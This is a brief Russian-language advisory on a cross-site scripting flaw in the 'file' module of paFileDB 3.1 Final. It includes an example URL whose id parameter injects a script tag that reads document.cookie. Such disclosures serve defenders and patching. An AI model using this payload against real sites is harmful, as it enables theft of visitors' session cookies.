Программа: paFileDB 3.1 Final 

Уязвимость обнаружена в paFileDB в модуле ‘file’. Удаленный пользователь может выполнить XSS нападение. 

Пример: 

http://[target]/downloads/pafiledb.php?action= file&id=1?%22><script>alert(document.cookie)
</script>



Оставить мнение